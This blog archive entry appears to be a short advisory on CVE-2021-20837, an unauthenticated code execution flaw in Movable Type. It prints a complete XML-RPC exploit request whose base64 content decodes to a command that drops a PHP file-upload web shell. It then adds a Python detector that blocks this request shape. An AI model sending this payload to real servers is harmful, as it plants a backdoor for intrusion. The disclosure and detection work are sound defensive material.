December 2021 Archives

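Movable Type recently had a serious vulnerability disclosed: an attacker can specify mt.handler_to_coderef in the methodName of a SOAP-protocol request to execute the content carried in the base64 element, for example: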

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
YGVjaG8gUEQ5d2FIQWdhV1lvSkY5UVQxTlVLWHRwWmloQVkyOXdlU2drWDBaSlRFVlRXeUl3SWwxYkluUnRjRjl1WVcxbElsMHNKRjlHU1V4RlUxc2lNQ0pkV3lKdVlXMWxJbDBwS1h0bFkyaHZJbGtpTzMxbGJITmxlMlZqYUc4aVRpSTdmWDFsYkhObGUyVmphRzhpUEdadmNtMGdiV1YwYUc5a1BYQnZjM1FnWlc1amRIbHdaVDF0ZFd4MGFYQmhjblF2Wm05eWJTMWtZWFJoUGp4cGJuQjFkQ0IwZVhCbFBXWnBiR1VnYm1GdFpUMHdQanhwYm5CMWRDQnVZVzFsUFRBZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOWRYQStJanQ5UHo0PSB8IGJhc2U2NCAtZCB8IHRlZSBmaWxlLXVwbG9hZGVyLnBocGA
</base64>
</value>
</param>
</params>
</methodCall>

The latest official version (v7.9.0) has fixed this.

For details, see: https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
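
A defender-side check for the request shape shown above, as an added example that is not part of the original post or of Movable Type: it parses a request body, blocks calls whose methodName is mt.handler_to_coderef, and records the decoded size of each base64 parameter for triage. The function name, verdict strings and sample bodies (including the metaWeblog.getRecentPosts call) are constructed for illustration.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Method name taken from the post; extend with other handlers you never expose.
BLOCKED_METHODS = {"mt.handler_to_coderef"}

def inspect_xmlrpc_body(body: bytes) -> dict:
    """Classify one request body (hypothetical helper, not Movable Type code)."""
    # Reject DTDs up front: these calls never need them and they enable entity abuse.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return {"verdict": "reject", "reason": "dtd-present"}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"verdict": "reject", "reason": "malformed-xml"}
    if root.tag != "methodCall":
        return {"verdict": "reject", "reason": "not-a-methodcall"}
    method = (root.findtext("methodName") or "").strip()
    sizes = []
    for node in root.iter("base64"):
        text = "".join((node.text or "").split())   # drop line breaks and indentation
        text += "=" * (-len(text) % 4)              # senders often omit padding
        try:
            sizes.append(len(base64.b64decode(text, validate=True)))
        except (binascii.Error, ValueError):
            sizes.append(-1)                        # -1 marks undecodable data
    verdict = "block" if method.lower() in BLOCKED_METHODS else "allow"
    return {"verdict": verdict, "method": method, "base64_sizes": sizes}

# Constructed sample bodies; the base64 content is a harmless placeholder.
PLACEHOLDER = b"constructed-placeholder"

def _call(method: bytes, b64: bytes) -> bytes:
    return (b'<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>'
            + method + b"</methodName><params><param><value><base64>\n"
            + b64 + b"\n</base64></value></param></params></methodCall>")

SUSPICIOUS = _call(b"mt.handler_to_coderef", base64.b64encode(PLACEHOLDER).rstrip(b"="))
BENIGN = _call(b"metaWeblog.getRecentPosts", base64.b64encode(PLACEHOLDER))
WITH_DTD = b'<!DOCTYPE x [<!ENTITY a "b">]>' + BENIGN

if __name__ == "__main__":
    for name, body in [("suspicious", SUSPICIOUS), ("benign", BENIGN), ("dtd", WITH_DTD)]:
        print(name, inspect_xmlrpc_body(body))
```

The same check can run at a reverse proxy or over archived request bodies; a `block` verdict on a host that has not yet been upgraded to the fixed version is worth an incident-response look at files written around that time.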


About this Archive

This page is an archive of entries from December 2021 listed from newest to oldest.
